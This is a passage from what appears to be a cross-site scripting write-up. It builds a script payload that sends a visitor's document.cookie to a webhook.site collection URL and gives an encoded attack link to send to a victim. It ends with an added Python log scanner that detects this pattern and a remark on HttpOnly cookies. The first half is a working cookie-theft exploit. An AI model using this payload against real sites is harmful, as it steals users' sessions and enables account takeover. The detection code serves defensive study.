We can use the following site so that we do not need to host our own web server: https://webhook.site/
With a webhook in hand, we are ready to craft the payload. It should look like the one below; make sure to replace [URL] with the generated webhook address.
A simple test can be created first with this:
<img src="[URL]/test.jpg" /> <script src="http://[URL]/test.js"></script>
<script>
document.write('<img src="[URL]?c='+document.cookie+'" />');
</script>
Once the browser renders the JavaScript, the <img> tag should look like the following and send the cookies to our website:
<img src="[URL]?c=[COOKIE]"/>
Before sending the link to the victim, make sure you encode the + symbols by replacing them with %2b, since a literal + in a query string is decoded as a space and would break the payload.
An example payload will look like the following:
http://vulnerable.webapp/index.php?name=<script>document.write('<img src="https://webhook.site/xxx-xxx-xxx/?c='%2bdocument.cookie%2b'" />');</script>
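As an added defensive example (not part of the original write-up), the Python snippet below URL-decodes the request targets in a constructed access log and flags the cookie-exfiltration pattern shown above; decoding is repeated until stable so the %2b encoding, or double encoding, does not hide the payload. The log lines, IPs, and timestamps are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (IPs, timestamps and payloads are made up for this example).
# Line 2 is the write-up's payload as a browser sends it; line 4 is the same idea double-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?name=alice HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php?name=%3Cscript%3Edocument.write('%3Cimg%20src%3D%22https://webhook.site/xxx-xxx-xxx/?c%3D'%2bdocument.cookie%2b'%22%20/%3E');%3C/script%3E HTTP/1.1" 200 640
10.0.0.7 - - [01/Jan/2024:10:00:12 +0000] "GET /search?q=1%2b1 HTTP/1.1" 200 300
10.0.0.12 - - [01/Jan/2024:10:00:20 +0000] "GET /index.php?name=%253Cscript%253Edocument.cookie%253C/script%253E HTTP/1.1" 200 601
"""

# Indicators that make up the cookie-exfiltration pattern shown in the write-up.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "cookie_read": re.compile(r"document\s*\.\s*cookie", re.I),
    "dom_write": re.compile(r"document\s*\.\s*write", re.I),
    "external_img": re.compile(r"<\s*img\b[^>]*src\s*=\s*['\"]?https?://", re.I),
}

# Client address and request target from a combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

def fully_decode(target: str, max_rounds: int = 3) -> str:
    """URL-decode until the string stops changing, so %2b or %253C cannot hide the payload."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def scan_line(line: str):
    """Flag a request whose decoded target reads document.cookie next to a tag that can carry it off-site."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    decoded = fully_decode(target)
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    if "cookie_read" in hits and ("script_tag" in hits or "external_img" in hits):
        return {"client": client, "indicators": hits, "decoded": decoded}
    return None

def scan_log(text: str):
    """Scan every line of an access log and return the findings in order."""
    return [f for f in (scan_line(line) for line in text.splitlines()) if f]
```

Note that document.cookie cannot read cookies set with the HttpOnly flag, so marking session cookies HttpOnly limits what this payload can exfiltrate even where the injection itself remains.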